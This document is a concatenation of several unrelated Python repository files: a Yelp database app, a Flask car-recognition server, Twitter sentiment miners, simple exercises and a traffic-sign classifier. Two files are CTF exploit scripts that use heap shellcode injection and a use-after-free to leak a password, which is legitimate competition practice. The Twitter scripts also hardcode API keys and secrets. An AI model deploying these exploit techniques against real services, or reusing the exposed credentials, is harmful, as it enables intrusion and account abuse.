val=str(business_id)
val2=int(zipcode)
except ValueError:
return [("Error! Insert correct data type.",)]
# Create a new connection
global con
con=connection()
# Create a cursor on the connection
cur=con.cursor()
    #check for existence of given data inside the yelp.db and that the value is allowed
curcheck=con.cursor()
cur.execute("select var('business_id',?)", (val,))
check=curcheck.execute("SELECT business_id from business where business_id=?;",(val,))
try:
ch=check.next()
except StopIteration:
return [("Error! Insert valid Business Id.",)]
if val2>99999999999999999999: #we do not actually need that
return [("Error! Insert valid Zip code.",)]
#execute main sql query
res=cur.execute("UPDATE business set zip_code=? where business_id=?;",(val2,val,))
#return ok or comment that return and de-comment the bottom return for the business_id and the new zip_code
return [('ok',)]
#res=cur.execute("SELECT business_id, zip_code from business where business_id=?;",(val,))
#l=[("business_id", "zip_code"),]
#for i in res:
# l.append(i)
#return l
def selectTopNbusinesses(category_id,n):
#check for compatible data type
try:
val=int(category_id)
val2=int(n)
except ValueError:
return [("Error! Insert correct data type",)]
# Create a new connection
global con
con=connection()
# Create a cursor on the connection
cur=con.cursor()
    #check for existence of given data inside the yelp.db
curcheck=con.cursor()
cur.execute("SELECT var('category_id',?)", (val,))
check=curcheck.execute("SELECT category_id from category where category_id=?;",(val,))
try:
ch=check.next()
except StopIteration:
return [("Error! Insert valid Category Id.",)]
if val2<0:
return [("Error! Choose >=0 businesses to return.",)]
#execute main sql query
res=cur.execute("SELECT b.business_id, count(rpn.positive) from reviews_pos_neg rpn, reviews r, business b, business_category bc, category c where rpn.review_id=r.review_id and r.business_id=b.business_id and b.business_id=bc.business_id and bc.category_id=c.category_id and c.category_id=? group by b.business_id order by count(rpn.positive) desc;",(val,))
#return a list with the results
l=[("business_id", "number_of_reviews",)]
for i in res:
l.append(i)
return l[0:val2+1]
def traceUserInfuence(userId,depth):
# Create a new connection
con=connection()
# Create a cursor on the connection
cur=con.cursor()
return [("user_id",),]
|
Python
| 206
| 26.485437
| 361
|
/yelp_python/app.py
| 0.622395
| 0.612681
|
smellycats/SX-CarRecgServer
|
refs/heads/master
|
from car_recg import app
from car_recg.recg_ser import RecgServer
from ini_conf import MyIni
if __name__ == '__main__':
rs = RecgServer()
rs.main()
my_ini = MyIni()
sys_ini = my_ini.get_sys_conf()
app.config['THREADS'] = sys_ini['threads']
app.config['MAXSIZE'] = sys_ini['threads'] * 16
app.run(host='0.0.0.0', port=sys_ini['port'], threaded=True)
del rs
del my_ini
|
Python
| 14
| 27.857143
| 64
|
/run.py
| 0.613861
| 0.59901
|
smellycats/SX-CarRecgServer
|
refs/heads/master
|
# -*- coding: utf-8 -*-
import Queue
class Config(object):
    # secret key, string
    SECRET_KEY = 'hellokitty'
    # server name, string
    HEADER_SERVER = 'SX-CarRecgServer'
    # hash rounds, int
    ROUNDS = 123456
    # token lifetime in seconds, int
    EXPIRES = 7200
    # database connection, string
    SQLALCHEMY_DATABASE_URI = 'mysql://root:[email protected]/hbc_store'
    # database connection binds, dict
    SQLALCHEMY_BINDS = {}
    # user permission scopes, dict
    SCOPE_USER = {}
    # whitelist enabled, bool
    WHITE_LIST_OPEN = True
    # whitelist, set
    WHITE_LIST = set()
    # number of worker threads, int
    THREADS = 4
    # maximum queue size, 16x the thread count, int
    MAXSIZE = THREADS * 16
    # image download folder, string
    IMG_PATH = 'img'
    # cropped image folder, string
    CROP_PATH = 'crop'
    # timeout, int
    TIMEOUT = 5
    # recognition priority queue, object
    RECGQUE = Queue.PriorityQueue()
    # quit flag, bool
    IS_QUIT = False
    # user dict
    USER = {}
    # upload file save path, string
    UPLOAD_PATH = 'upload'
class Develop(Config):
DEBUG = True
class Production(Config):
DEBUG = False
class Testing(Config):
TESTING = True
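# Usage sketch (assumes a Flask app object elsewhere in the car_recg package; the call below is illustrative):
#   app.config.from_object('car_recg.config.Develop')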
|
Python
| 53
| 17.905661
| 69
|
/car_recg/config.py
| 0.593812
| 0.56986
|
smellycats/SX-CarRecgServer
|
refs/heads/master
|
# -*- coding: utf-8 -*-
import os
import Queue
import random
from functools import wraps
import arrow
from flask import g, request
from flask_restful import reqparse, Resource
from passlib.hash import sha256_crypt
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
from car_recg import app, db, api, auth, limiter, logger, access_logger
from models import Users, Scope
import helper
def verify_addr(f):
"""IP地址白名单"""
@wraps(f)
def decorated_function(*args, **kwargs):
if not app.config['WHITE_LIST_OPEN'] or request.remote_addr == '127.0.0.1' or request.remote_addr in app.config['WHITE_LIST']:
pass
else:
            return {'status': '403.6',
                    'message': u'Forbidden: the client IP address has been rejected'}, 403
return f(*args, **kwargs)
return decorated_function
@auth.verify_password
def verify_password(username, password):
if username.lower() == 'admin':
user = Users.query.filter_by(username='admin').first()
else:
return False
if user:
return sha256_crypt.verify(password, user.password)
return False
def verify_token(f):
"""token验证装饰器"""
@wraps(f)
def decorated_function(*args, **kwargs):
if not request.headers.get('Access-Token'):
return {'status': '401.6', 'message': 'missing token header'}, 401
token_result = verify_auth_token(request.headers['Access-Token'],
app.config['SECRET_KEY'])
if not token_result:
return {'status': '401.7', 'message': 'invalid token'}, 401
elif token_result == 'expired':
return {'status': '401.8', 'message': 'token expired'}, 401
g.uid = token_result['uid']
g.scope = set(token_result['scope'])
return f(*args, **kwargs)
return decorated_function
def verify_scope(scope_name):
    def decorator(f):
        """Scope verification decorator"""
        @wraps(f)
        def decorated_function(*args, **kwargs):
            if 'all' in g.scope or scope_name in g.scope:
                return f(*args, **kwargs)
            else:
                return {}, 405
        return decorated_function
    return decorator
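# Hedged usage sketch (the resource class and scope name below are illustrative, not from this project):
#   class ExampleApi(Resource):
#       @verify_token
#       @verify_scope('recg')
#       def get(self):
#           return {'ok': True}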
class Index(Resource):
def get(self):
return {
'user_url': '%suser{/user_id}' % (request.url_root),
'scope_url': '%suser/scope' % (request.url_root),
'token_url': '%stoken' % (request.url_root),
'recg_url': '%sv1/recg' % (request.url_root),
'uploadrecg_url': '%sv1/uploadrecg' % (request.url_root),
'state_url': '%sv1/state' % (request.url_root)
}, 200, {'Cache-Control': 'public, max-age=60, s-maxage=60'}
class RecgListApiV1(Resource):
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('imgurl', type=unicode, required=True,
help='A jpg url is require', location='json')
parser.add_argument('coord', type=list, required=True,
help='A coordinates array is require',
location='json')
args = parser.parse_args()
        # message queue used for the callback
que = Queue.Queue()
if app.config['RECGQUE'].qsize() > app.config['MAXSIZE']:
return {'message': 'Server Is Busy'}, 449
imgname = '%32x' % random.getrandbits(128)
imgpath = os.path.join(app.config['IMG_PATH'], '%s.jpg' % imgname)
try:
helper.get_url_img(request.json['imgurl'], imgpath)
except Exception as e:
logger.error('Error url: %s' % request.json['imgurl'])
return {'message': 'URL Error'}, 400
app.config['RECGQUE'].put((10, request.json, que, imgpath))
try:
recginfo = que.get(timeout=15)
os.remove(imgpath)
except Queue.Empty:
return {'message': 'Timeout'}, 408
except Exception as e:
logger.error(e)
else:
return {
'imgurl': request.json['imgurl'],
'coord': request.json['coord'],
'recginfo': recginfo
}, 201
class StateListApiV1(Resource):
def get(self):
return {
'threads': app.config['THREADS'],
'qsize': app.config['RECGQUE'].qsize()
}
class UploadRecgListApiV1(Resource):
def post(self):
        # folder path, string
filepath = os.path.join(app.config['UPLOAD_PATH'],
arrow.now().format('YYYYMMDD'))
if not os.path.exists(filepath):
os.makedirs(filepath)
try:
            # uploaded file name: random 32-character hex string
imgname = '%32x' % random.getrandbits(128)
            # absolute file path, string
imgpath = os.path.join(filepath, '%s.jpg' % imgname)
f = request.files['file']
f.save(imgpath)
except Exception as e:
logger.error(e)
return {'message': 'File error'}, 400
        # message queue used for the callback, object
que = Queue.Queue()
        # recognition parameter dict
r = {'coord': []}
app.config['RECGQUE'].put((9, r, que, imgpath))
try:
recginfo = que.get(timeout=app.config['TIMEOUT'])
except Queue.Empty:
return {'message': 'Timeout'}, 408
except Exception as e:
logger.error(e)
else:
return {'coord': r['coord'], 'recginfo': recginfo}, 201
api.add_resource(Index, '/')
api.add_resource(RecgListApiV1, '/v1/recg')
api.add_resource(StateListApiV1, '/v1/state')
api.add_resource(UploadRecgListApiV1, '/v1/uploadrecg')
|
Python
| 176
| 30.78409
| 134
|
/car_recg/views.py
| 0.558634
| 0.540222
|
josemiche11/reversebycondition
|
refs/heads/master
|
'''
Input- zoho123
Output- ohoz123
'''
char= input("Enter the string: ")
char2= list(char)
num= "1234567890"
list1= [0]*len(char)
list2=[]
for i in range(len(char)):
if char2[i] not in num:
list2.append( char2.index( char2[i]))
char2[i]= "*"
list2.reverse()
k=0
for j in range( len(char) ):
if j in list2:
list1[j]= char[list2[k]]
k= k+1
else:
list1[j]= char[j]
ch=""
for l in range(len(list1)):
ch= ch+ list1[l]
print(ch)
|
Python
| 26
| 17.461538
| 45
|
/reversebycondition.py
| 0.539526
| 0.472332
|
Lasyin/batch-resize
|
refs/heads/master
|
import os
import sys
import argparse
from PIL import Image # From Pillow (pip install Pillow)
def resize_photos(dir, new_x, new_y, scale):
if(not os.path.exists(dir)):
        # if not in full path format (/users/user/....)
# check if path is in local format (folder is in current working directory)
if(not os.path.exists(os.path.join(os.getcwd(), dir))):
print(dir + " does not exist.")
exit()
else:
# path is not a full path, but folder exists in current working directory
# convert path to full path
dir = os.path.join(os.getcwd(), dir)
i = 1 # image counter for print statements
for f in os.listdir(dir):
if(not f.startswith('.') and '.' in f):
# accepted image types. add more types if you need to support them!
accepted_types = ["jpg", "png", "bmp"]
if(f[-3:].lower() in accepted_types):
# checks last 3 letters of file name to check file type (png, jpg, bmp...)
# TODO: need to handle filetypes of more than 3 letters (for example, jpeg)
path = os.path.join(dir, f)
img = Image.open(path)
if(scale > 0):
w, h = img.size
newIm = img.resize((w*scale, h*scale))
else:
newIm = img.resize((new_x, new_y))
newIm.save(path)
print("Image #" + str(i) + " finsihed resizing: " + path)
i=i+1
else:
print(f + " of type: " + f[-3:].lower() + " is not an accepted file type. Skipping.")
print("ALL DONE :) Resized: " + str(i) + " photos")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-d", "-directory", help="(String) Specify the folder path of images to resize")
parser.add_argument("-s", "-size", help="(Integer) New pixel value of both width and height. To specify width and height seperately, use -x and -y.")
parser.add_argument("-x", "-width", help="(Integer) New pixel value of width")
parser.add_argument("-y", "-height", help="(Integer) New pixel value of height")
parser.add_argument("-t", "-scale", help="(Integer) Scales pixel sizes.")
args = parser.parse_args()
if(not args.d or ((not args.s) and (not args.x and not args.y) and (not args.t))):
print("You have error(s)...\n")
if(not args.d):
print("+ DIRECTORY value missing Please provide a path to the folder of images using the argument '-d'\n")
if((not args.s) and (not args.x or not args.y) and (not args.t)):
print("+ SIZE value(s) missing! Please provide a new pixel size. Do this by specifying -s (width and height) OR -x (width) and -y (height) values OR -t (scale) value")
exit()
x = 0
y = 0
scale = 0
if(args.s):
x = int(args.s)
y = int(args.s)
elif(args.x and args.y):
x = int(args.x)
y = int(args.y)
elif(args.t):
scale = int(args.t)
print("Resizing all photos in: " + args.d + " to size: " + str(x)+"px,"+str(y)+"px")
resize_photos(args.d, x, y, scale)
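# Example invocations (the paths are illustrative):
#   python batch_resize.py -d ./photos -s 256        # square resize to 256x256
#   python batch_resize.py -d ./photos -x 800 -y 600 # explicit width and height
#   python batch_resize.py -d ./photos -t 2          # scale width and height by 2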
|
Python
| 73
| 43.109589
| 179
|
/batch_resize.py
| 0.554969
| 0.551863
|
snehG0205/Twitter_Mining
|
refs/heads/master
|
import tweepy
import csv
import pandas as pd
from textblob import TextBlob
import matplotlib.pyplot as plt
####input your credentials here
consumer_key = 'FgCG8zcxF4oINeuAqUYzOw9xh'
consumer_secret = 'SrSu7WhrYUpMZnHw7a5ui92rUA1n2jXNoZVb3nJ5wEsXC5xlN9'
access_token = '975924102190874624-uk5zGlYRwItkj7pZO2m89NefRm5DFLg'
access_token_secret = 'ChvmTjG8hl61xUrXkk3AdKcXMlvAKf4ise1kIQLKsnPu4'
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth,wait_on_rate_limit=True)
# Open/Create a file to append data
csvFile = open('tweets.csv', 'w+')
# Use csv Writer
csvWriter = csv.writer(csvFile)
tag = "#DonaldTrump"
limit = 0
res = ""
positive = 0
negative = 0
neutral = 0
csvWriter.writerow(["ID", "Username", "Twitter @", "Tweet","Tweeted At", "Favourite Count", "Retweet Count", "Sentiment"])
csvWriter.writerow([])
for tweet in tweepy.Cursor(api.search,q=""+tag,count=350,lang="en",tweet_mode = "extended").items():
# print (tweet.created_at, tweet.text)
temp = tweet.full_text
if temp.startswith('RT @'):
continue
blob = TextBlob(tweet.full_text)
if blob.sentiment.polarity > 0:
res = "Positive"
positive = positive+1
elif blob.sentiment.polarity == 0:
res = "Neutral"
neutral = neutral+1
else:
res = "Negative"
negative = negative+1
print ("ID:", tweet.id)
print ("User ID:", tweet.user.id)
print ("Name: ", tweet.user.name)
print ("Twitter @:", tweet.user.screen_name)
print ("Text:", tweet.full_text)
print ("Tweet length:", len(tweet.full_text))
print ("Created:(UTC)", tweet.created_at)
print ("Favorite Count:", tweet.favorite_count)
print ("Retweet count:", tweet.retweet_count)
print ("Sentiment:", res)
# print ("Retweeted? :", tweet.retweeted)
# print ("Truncated:", tweet.truncated)
print ("\n\n")
csvWriter.writerow([tweet.id, tweet.user.name, tweet.user.screen_name, tweet.full_text,tweet.created_at, tweet.favorite_count, tweet.retweet_count, res])
csvWriter.writerow([])
limit = limit + 1
if limit == 25:
break
print ("Done")
print ("\n\n\n")
total = positive+negative+neutral
positivePercent = 100*(positive/total)
negativePercent = 100*(negative/total)
neutralPercent = 100*(neutral/total)
print ("Positive tweets: {} %".format(positivePercent))
print ("Negative tweets: {} %".format(negativePercent))
print ("Neutral tweets: {} %".format(neutralPercent))
# infile = 'tweets.csv'
# with open(infile, 'r') as csvfile:
# rows = csv.reader(csvfile)
# for row in rows:
# sentence = row[3]
# blob = TextBlob(sentence)
# print (blob.sentiment)
labels = 'Neutral', 'Positive', 'Negative'
sizes = []
sizes.append(neutralPercent)
sizes.append(positivePercent)
sizes.append(negativePercent)
colors = ['lightskyblue','yellowgreen', 'lightcoral']
explode = (0.0, 0, 0) # explode 1st slice
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=False, startangle=140)
plt.suptitle("Sentiment Analysis of {} tweets related to {}".format(limit, tag))
plt.axis('equal')
plt.show()
|
Python
| 104
| 28.73077
| 157
|
/tweepy_tester.py
| 0.66796
| 0.655674
|
snehG0205/Twitter_Mining
|
refs/heads/master
|
import tweepy
import csv
import pandas as pd
# keys and tokens from the Twitter Dev Console
consumer_key = 'FgCG8zcxF4oINeuAqUYzOw9xh'
consumer_secret = 'SrSu7WhrYUpMZnHw7a5ui92rUA1n2jXNoZVb3nJ5wEsXC5xlN9'
access_token = '975924102190874624-uk5zGlYRwItkj7pZO2m89NefRm5DFLg'
access_token_secret = 'ChvmTjG8hl61xUrXkk3AdKcXMlvAKf4ise1kIQLKsnPu4'
#Twitter only allows access to a users most recent 3240 tweets with this method
#authorize twitter, initialize tweepy
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
#initialize a list to hold all the tweepy Tweets
alltweets = []
#make initial request for most recent tweets (200 is the maximum allowed count)
new_tweets = api.search(q="#DonaldTrump",count=200,tweet_mode="extended")
#save most recent tweets
alltweets.extend(new_tweets)
#save the id of the oldest tweet less one
oldest = alltweets[-1].id - 1
#keep grabbing tweets until there are no tweets left to grab
while len(new_tweets) > 0:
    # print "getting tweets before %s" % (oldest)
    #all subsequent requests use the max_id param to prevent duplicates
    new_tweets = api.search(q="#DonaldTrump",count=200,max_id=oldest,tweet_mode="extended")
    #save most recent tweets
    alltweets.extend(new_tweets)
    #update the id of the oldest tweet less one
    oldest = alltweets[-1].id - 1
    # print "...%s tweets downloaded so far" % (len(alltweets))
#transform the tweepy tweets into a 2D array that will populate the csv
outtweets = [[tweet.id_str, tweet.created_at, tweet.full_text.encode("utf-8"), tweet.retweet_count, tweet.favorite_count] for tweet in alltweets]
#write the csv
with open('tweets.csv', 'w+') as f:
writer = csv.writer(f)
writer.writerow(["id","created_at","full_text","retweet_count","favorite_count"])
writer.writerows(outtweets)
|
Python
| 52
| 32.53846
| 146
|
/twitter1.py
| 0.729513
| 0.716332
|
snehG0205/Twitter_Mining
|
refs/heads/master
|
import csv
csvFile = open('res.csv', 'w+')
|
Python
| 2
| 20.5
| 31
|
/tester.py
| 0.642857
| 0.642857
|
snehG0205/Twitter_Mining
|
refs/heads/master
|
from test import mining
tag = "#WednesdayWisdom"
limit = "10"
sen_list = mining(tag,int(limit))
print(sen_list)
|
Python
| 5
| 21.4
| 33
|
/Twitter-Flask/untitled.py
| 0.72973
| 0.711712
|
snehG0205/Twitter_Mining
|
refs/heads/master
|
from flask import Flask, render_template, request
from test import mining
app = Flask(__name__)
@app.route('/')
def index():
return render_template('hello.html')
@app.route('/', methods=['POST'])
def submit():
if request.method == 'POST':
print (request.form) # debug line, see data printed below
tag = request.form['tag']
limit = request.form['limit']
# msg = tag+" "+limit
sen_list = mining(tag,limit)
msg = "Positive Percent = "+sen_list[0]+"% <br>Negative Percent = "+sen_list[1]+"% <br>Neutral Percent = "+sen_list[2]+"%"
return ""+msg
if __name__ == '__main__':
app.run(debug = True)
print("This")
|
Python
| 24
| 25.416666
| 124
|
/Twitter-Flask/app.py
| 0.631912
| 0.627172
|
snehG0205/Twitter_Mining
|
refs/heads/master
|
#!/usr/bin/env python
print ("some output")
return "hello"
|
Python
| 4
| 14
| 21
|
/Twitter-Flask/hello.py
| 0.694915
| 0.694915
|
snehG0205/Twitter_Mining
|
refs/heads/master
|
import matplotlib.pyplot as plt
# Data to plot
labels = 'Neutral', 'Positive', 'Negative'
sizes = [20, 40, 40]
colors = ['lightskyblue','yellowgreen', 'lightcoral']
explode = (0.0, 0, 0) # explode 1st slice
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
# plt.title('Sentiment analysis')
plt.suptitle('Analysing n tweets related to #')
plt.show()
|
Python
| 16
| 27.125
| 61
|
/piPlotter.py
| 0.685969
| 0.650334
|
nopple/ctf
|
refs/heads/master
|
#!/usr/bin/env python
import socket, subprocess, sys
from struct import pack, unpack
global scenes
global officers
scenes = {}
officers = {}
remote = len(sys.argv) > 1
PORT = 8888
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if remote:
HOST = "dosfun4u_5d712652e1d06a362f7fc6d12d66755b.2014.shallweplayaga.me"
else:
HOST = '127.0.0.1'
def chksum(data):
ret = 0
for d in data:
ret += ord(d)
return ret & 0xffff
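# Worked example: chksum('ab') == (0x61 + 0x62) & 0xffff == 0xc3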
def add_officer(officer_id, status=0, x=0, y=0):
global officers
print 'update' if officers.has_key(officer_id) and officers[officer_id] else 'add', 'officer', hex(officer_id)
officers[officer_id] = True
payload = pack('H', 0x7d0)
payload += pack('H', officer_id)
payload += pack('H', status)
payload += pack('H', x)
payload += pack('H', y)
payload += pack('H', 0x0)
return payload
def remove_officer(officer_id):
global officers
print 'remove officer', hex(officer_id), 'should work' if officers.has_key(officer_id) and officers[officer_id] else 'should fail'
officers[officer_id] = False
payload = pack('H', 0xbb8)
payload += pack('H', officer_id)
return payload
def add_scene(scene_id, data2, data3, inline_data='', x=0, y=0):
global scenes
print 'update' if scenes.has_key(scene_id) and scenes[scene_id] else 'add', 'scene', hex(scene_id)
scenes[scene_id] = True
size1 = len(inline_data)/2
size2 = len(data2)
size3 = len(data3)
payload = pack('H', 0xfa0)
payload += pack('H', scene_id)
payload += pack('H', x)
payload += pack('H', y)
payload += pack('B', size1)
payload += pack('B', size2)
payload += pack('H', size3)
payload += pack('H', 0)
payload += inline_data[:size1*2]
payload += data2
payload += data3
return payload
def recv_all(s, size):
ret = []
received = 0
while size > received:
c = s.recv(size-received)
if c == '':
raise Exception('Connection closed')
ret.append(c)
received += len(c)
return ''.join(ret)
def recv_until(s, pattern):
ret = ''
while True:
c = s.recv(1)
if c == '':
raise Exception("Connection closed")
ret += c
if ret.find(pattern) != -1:
break
return ret
s.connect((HOST, PORT))
if remote:
print s.recv(4096)
buf = s.recv(4096)
print buf
data = buf.split(' ')[0]
print 'challenge = {}'.format(data)
print 'hashcatting...'
p = subprocess.Popen(['./hashcat', data], stdout=subprocess.PIPE);
result = p.communicate()[0].strip('\n\r\t ')
print 'response = {}'.format(result)
s.send(result)
def send_cmd(s,payload,recvLen=0):
payload += pack('H', chksum(payload))
s.send(payload)
return recv_all(s, recvLen)
shellcode = open('shellcode', 'rb').read()
print 'Getting block into free-list'
send_cmd(s,add_officer(1),5)
send_cmd(s,remove_officer(1),5)
print 'Adding officer to reuse block from free-list'
send_cmd(s,add_officer(0xc),5)
print 'Writing shellcode to 008f:0000'
send_cmd(s,add_scene(1, pack("<HHHHHH", 0xc, 0, 0x4688, 0x8f, 0, 0), shellcode),5)
print 'Modifying officer structure to include pointer to fake officer on stack'
send_cmd(s,add_scene(2, pack("<HHHHHH", 1, 0, 0, 0, 0x47aa, 0x011f), "lolololol"),5)
print 'Writing return to shellcode on stack'
send_cmd(s,add_officer(0x945, 0x1d26, 0x10, 0x97),5)
print 'Receiving response...'
print 'Key 1:', recv_until(s,'\n').replace('\x00', '')[:-1]
print 'Key 2:', recv_until(s,'\n')[:-1]
|
Python
| 124
| 25.620968
| 131
|
/dosfun4u/pwn.py
| 0.668585
| 0.624962
|
nopple/ctf
|
refs/heads/master
|
#!/usr/bin/env python
import socket
from struct import pack, unpack
DEBUG = False
server = "shitsco_c8b1aa31679e945ee64bde1bdb19d035.2014.shallweplayaga.me"
server = "127.0.0.1"
port = 31337
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
s.settimeout(30)
def recv_until(s, pattern):
ret = ''
while True:
c = s.recv(1)
if c == '':
raise Exception("Connection closed")
ret += c
if ret.find(pattern) != -1:
break
return ret
# trigger use-after-free by creating 2 items and then removing them in order
print recv_until(s, "$ ")
print "set 1 abcd"
s.send("set 1 abcd\n")
print recv_until(s, "$ ")
print "set 2 abcd"
s.send("set 2 abcd\n")
print recv_until(s, "$ ")
print "set 1"
s.send("set 1\n")
print recv_until(s, "$ ")
print "set 2"
s.send("set 2\n")
print recv_until(s, "$ ")
print "show <pointers>"
# set use-after-free item via strdup of argument to 'show' command
# first two items are the key,value pair followed by blink and flink
# use a pointer to the string "password" in the code section for the key (0x80495d0)
# use the location of the password in bss for the value (0x804c3a0)
# use something to terminate the linked list for flink and blink
# - can't use null directly here since the strdup allocation would be cut short (must be 16 bytes to re-use the free'd block)
# - just use a pointer to some nulls in bss instead (0x804c390)
s.send("show " + pack("<IIII", 0x80495d0, 0x804C3A0, 0x804C390, 0x0804C390) + "\n")
print recv_until(s, "$ ")
# now, this will simply dump the password for us
print "show"
s.send("show\n")
a = recv_until(s, ': ')
pw = recv_until(s, '\n')[:-1]
b = recv_until(s, "$ ")
print a + pw + '\n' + b
print 'Enable password: "' + pw + '"'
print "enable " + pw
s.send('enable ' + pw + '\n')
print recv_until(s, "# ")
print "flag"
s.send('flag\n')
print recv_until(s, "# ")
print "quit"
s.send('quit\n')
|
Python
| 71
| 25.830986
| 127
|
/shitsco/pwn.py
| 0.669816
| 0.618898
|
phu-bui/Nhan_dien_bien_bao_giao_thong
|
refs/heads/master
|
import tkinter as tk
from tkinter import filedialog
from tkinter import *
from PIL import Image, ImageTk
import numpy
from keras.models import load_model
model = load_model('BienBao.h5')
class_name = {
1:'Speed limit (20km/h)',
2:'Speed limit (30km/h)',
3:'Speed limit (50km/h)',
4:'Speed limit (60km/h)',
5:'Speed limit (70km/h)',
6:'Speed limit (80km/h)',
7:'End of speed limit (80km/h)',
8:'Speed limit (100km/h)',
9:'Speed limit (120km/h)',
10:'No passing',
11:'No passing veh over 3.5 tons',
12:'Right-of-way at intersection',
13:'Priority road',
14:'Yield',
15:'Stop',
16:'No vehicles',
17:'Veh > 3.5 tons prohibited',
18:'No entry',
19:'General caution',
20:'Dangerous curve left',
21:'Dangerous curve right',
22:'Double curve',
23:'Bumpy road',
24:'Slippery road',
25:'Road narrows on the right',
26:'Road work',
27:'Traffic signals',
28:'Pedestrians',
29:'Children crossing',
30:'Bicycles crossing',
31:'Beware of ice/snow',
32:'Wild animals crossing',
33:'End speed + passing limits',
34:'Turn right ahead',
35:'Turn left ahead',
36:'Ahead only',
37:'Go straight or right',
38:'Go straight or left',
39:'Keep right',
40:'Keep left',
41:'Roundabout mandatory',
42:'End of no passing',
43:'End no passing veh > 3.5 tons'
}
top=tk.Tk()
top.geometry('800x600')
top.title('Traffic sign classification')
top.configure(background='#CDCDCD')
label = Label(top, background = '#CDCDCD', font=('arial',15,'bold'))
label.place(x=0, y=0, relwidth = 1, relheight = 1)
sign_image = Label(top)
def classify(file_path):
global label_packed
image = Image.open(file_path)
image = image.resize((30, 30))
image = numpy.expand_dims(image, axis=0)
image = numpy.array(image)
print(image.shape)
pred = model.predict_classes([image])[0]
sign = class_name[pred+1]
print(sign)
label.configure(foreground = '#011638', text = sign)
def show_classify_button(file_path):
    classify_button = Button(top,text='Classify', command = lambda : classify(file_path), padx=10, pady=5)
classify_button.configure(background='GREEN', foreground = 'white', font = ('arial', 10, 'bold'))
classify_button.place(relx = 0.79, rely = 0.46)
def upload_image():
try:
file_path = filedialog.askopenfilename()
uploaded = Image.open(file_path)
uploaded.thumbnail(((top.winfo_width()/2.25),
(top.winfo_height()/2.25)))
im = ImageTk.PhotoImage(uploaded)
sign_image.configure(image= im)
sign_image.image = im
label.configure(text='')
show_classify_button(file_path)
except:
pass
upload = Button(top, text='Upload an image', command=upload_image, padx = 10, pady = 5)
upload.configure(background='#364156', foreground = 'white', font = ('arial', 10, 'bold'))
upload.pack(side = BOTTOM, pady = 50)
sign_image.pack(side=BOTTOM, expand = True)
label.pack(side = BOTTOM, expand = True)
heading = Label(top, text = 'Your traffic sign', pady = 20, font = ('arial', 20, 'bold'))
heading.configure(background = '#CDCDCD', foreground = '#364156')
heading.pack()
top.mainloop()
|
Python
| 103
| 30.747572
| 107
|
/main.py
| 0.631386
| 0.579688
|
Jerin-Alisha/Python-Code-Assessment
|
refs/heads/master
|
def returnSum(dict):
sum=0
for i in dict:
sum=sum+dict[i]
return sum
dict={'Rick':85,'Amit':42,'George':53,'Tanya':60,'Linda':35}
print 'sum:', returnSum(dict)
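# Expected output for the dictionary above (85 + 42 + 53 + 60 + 35): sum: 275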
|
Python
| 7
| 24.714285
| 60
|
/Dictionary with function.py
| 0.582888
| 0.524064
|
Jerin-Alisha/Python-Code-Assessment
|
refs/heads/master
|
n=int(input("enter the numbers u want to print:"))
for i in range(1,n+1):
    if(i%3==0 and i%5==0):
        print ('FizzBuzz')
        continue
    elif(i%3==0):
        print ('Fizz')
        continue
    elif(i%5==0):
        print ('Buzz')
        continue
    print i
|
Python
| 9
| 21.222221
| 50
|
/FizzBuzz.py
| 0.46789
| 0.440367
|
Jerin-Alisha/Python-Code-Assessment
|
refs/heads/master
|
def switch(on_strike):
players = {1,2}
return list(players.difference(set([on_strike])))[0]
def get_player(previous_score, previous_player, previous_bowl_number):
if previous_score%2 == 0 and (previous_bowl_number%6 !=0 or previous_bowl_number ==0):
player = previous_player
elif previous_score%2 != 0 and previous_bowl_number % 6 == 0:
player = previous_player
else:
player = switch(previous_player)
return player
a = [1, 2, 0, 0, 4, 1, 6, 2, 1, 3]
player_turns = []
player_score_chart = {1:0, 2:0}
total_score = 0
previous_score=0
previous_player=1
previous_bowl_number=0
for runs in a:
player_turns.append(get_player(previous_score, previous_player, previous_bowl_number))
previous_bowl_number+=1
previous_score=runs
previous_player=player_turns[-1]
player_score_chart[previous_player] += previous_score
total_score += previous_score
print 'Total Score : ', total_score
print 'Batsman 1 Score : ', player_score_chart[1]
print 'Batsman 2 Score : ', player_score_chart[2]
|
Python
| 36
| 28.611111
| 90
|
/Cricket Match Player Score.py
| 0.646098
| 0.61343
|
Jerin-Alisha/Python-Code-Assessment
|
refs/heads/master
|
arr=[1,2,3,5,8,4,7,9,1,4,12,5,6,5,2,1,0,8,1]
a = [None] * len(arr)
visited = 0
for i in range(0, len(arr)):
    count = 1
    for j in range(i+1, len(arr)):
        if(arr[i] == arr[j]):
            count = count + 1
            a[j] = visited
    if(a[i] != visited):
        a[i] = count
for i in range(0, len(a)):
    if(a[i] != visited):
        print(" "+ str(arr[i]) +" has occurred "+ str(a[i])+" times")
|
Python
| 14
| 31.285715
| 69
|
/repeat.py
| 0.408511
| 0.353191
|
TheDinner22/lightning-sim
|
refs/heads/main
|
# represent the "board" in code
# dependencies
import random
class Board:
def __init__(self, width=10):
self.width = width
self.height = width * 2
self.WALL_CHANCE = .25
self.FLOOR_CHANCE = .15
# create the grid
self.create_random_grid()
def create_random_grid(self):
# reset old grid
self.grid = []
# generate cells for new grid
for i in range(self.width * self.height):
# is the cell at the left, right, top, or bottom?
is_left = True if i % self.width == 0 else False
is_right = True if i % self.width == self.width-1 else False
is_top = True if i < self.width else False
            is_bottom = True if i >= (self.width * self.height - self.width) else False
# create the cell
cell = {
"left" : is_left,
"right" : is_right,
"roof" : is_top,
"floor" : is_bottom,
"ID" : i
}
# append to grid
self.grid.append(cell)
# randomly generate walls
total = self.width * self.height
horizontal_amount = int(total * self.FLOOR_CHANCE)
verticle_amount = int(total * self.WALL_CHANCE)
# generate the walls
for _i in range(verticle_amount):
random_index = random.randrange(0, total)
adding_num = -1 if random_index == total - 1 else 1
first = "right" if adding_num == 1 else "left"
second = "right" if first == "left" else "left"
